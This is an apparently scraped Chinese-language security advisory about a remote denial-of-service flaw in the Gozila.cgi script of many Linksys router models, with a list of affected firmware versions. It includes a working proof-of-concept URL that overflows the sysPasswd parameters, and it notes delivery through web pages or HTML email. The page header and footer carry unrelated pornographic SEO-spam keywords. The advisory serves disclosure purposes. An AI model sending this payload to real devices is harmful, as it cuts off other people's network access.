成人在线你懂的-成人在线免费小视频-成人在线免费网站-成人在线免费视频观看-日韩精品国产一区二区-日韩精品国产一区

掃一掃
關注微信公眾號

多種Linksys路由器Gozila.cgi遠程拒絕服務漏洞
2005-08-10   


信息提供:

安全公告(或線索)提供熱線:51cto.editor@gmail.com

漏洞類別:

遠程拒絕服務漏洞

攻擊類型:

遠程攻擊

發布日期:

2004-06-03

更新日期:

2004-06-08

受影響系統:

Linksys EtherFast BEFSR41 Router 1.44
Linksys EtherFast BEFSR41 Router 1.43.3
Linksys EtherFast BEFSR41 Router 1.43
Linksys EtherFast BEFSR41 Router 1.42.7
Linksys EtherFast BEFSR41 Router 1.42.3
Linksys EtherFast BEFSR41 Router 1.41
Linksys EtherFast BEFSR41 Router 1.40.2
Linksys EtherFast BEFSR41 Router 1.39
Linksys EtherFast BEFSR41 Router 1.38
Linksys EtherFast BEFSR41 Router 1.37
Linksys EtherFast BEFSR41 Router 1.36
Linksys EtherFast BEFSR41 Router 1.35
Linksys EtherFast BEFSR11 Router 1.44
Linksys EtherFast BEFSR11 Router 1.43.3
Linksys EtherFast BEFSR11 Router 1.43
Linksys EtherFast BEFSR11 Router 1.42.7
Linksys EtherFast BEFSR11 Router 1.42.3
Linksys EtherFast BEFSR11 Router 1.41
Linksys EtherFast BEFSR11 Router 1.40.2
Linksys EtherFast BEFSRU31 Router 1.44
Linksys EtherFast BEFSRU31 Router 1.43.3
Linksys EtherFast BEFSRU31 Router 1.43
Linksys EtherFast BEFSRU31 Router 1.42.7
Linksys EtherFast BEFSRU31 Router 1.42.3
Linksys EtherFast BEFSRU31 Router 1.41
Linksys EtherFast BEFSRU31 Router 1.40.2
Linksys BEFSX41 1.45.3
Linksys BEFSX41 1.44.3
Linksys BEFSX41 1.44
Linksys BEFSX41 1.43.4
Linksys BEFSX41 1.43.3
Linksys BEFSX41 1.43
Linksys BEFSX41 1.42.7

安全系統:

漏洞報告人:

b0f

漏洞描述:

BUGTRAQ  ID: 10453
Linksys擁有多種網絡設備產品線。
多種Linksys路由器包含的Gozila.cgi腳本未能正確處理用戶提交的參數,遠程攻擊者可以利用這個漏洞對設備進行拒絕服務攻擊。
如果提交2條超長字符串給Gozila.cgi腳本的sysPasswd和sysPasswdConfirm參數,會導致路由器丟棄所有當前連接,需要使用reset按鈕來恢復出廠設置。
攻擊者可以構建WEB頁或發送惡意HTML形式EMAIL給目標用戶。

測試方法:

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

解決方法:

目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:
http://www.linksys.com



熱詞搜索:

上一篇:實例講解:BGP配置五大注意事項
下一篇:輕松9步加強路由器安全

分享到: 收藏
主站蜘蛛池模板: 美丽的坏女人中文字幕| 河北电视台| 爱她和我们的爱 电视剧| 朱丽安·摩尔| 宋允雅| 好妻子剧情简介| 《火烛鬼》大结局| 情侣签名一男一女简短| 葫撸娃| 可能歌词完整版| 张柏芝惊艳照片| cctv17节目表今天| 河北美术学院教务系统| 视频偷窥| 单色美甲图片| 秘密之门| 少年包青天3演员表| 雌雄同体seoⅹ另类| 美女出水| 董骥| 赌神电影| 32步简单舞步完整版| 奇骏车友会| 黄瀞怡| 海洋天堂电影免费观看高清| 男插女曲| 38在线电影| 权欲| 电影《死亡权限》免费观看| 林忆莲唱哭李宗盛现场| 卫平| 喜羊羊电影| 里番在线看| 2014春节联欢晚会| 巴霍巴利王2国语版在线观看免费| 聊斋电影| 爱情插班生| 常虹| 特级一级片| 赵汉善| you are my sunshine简谱|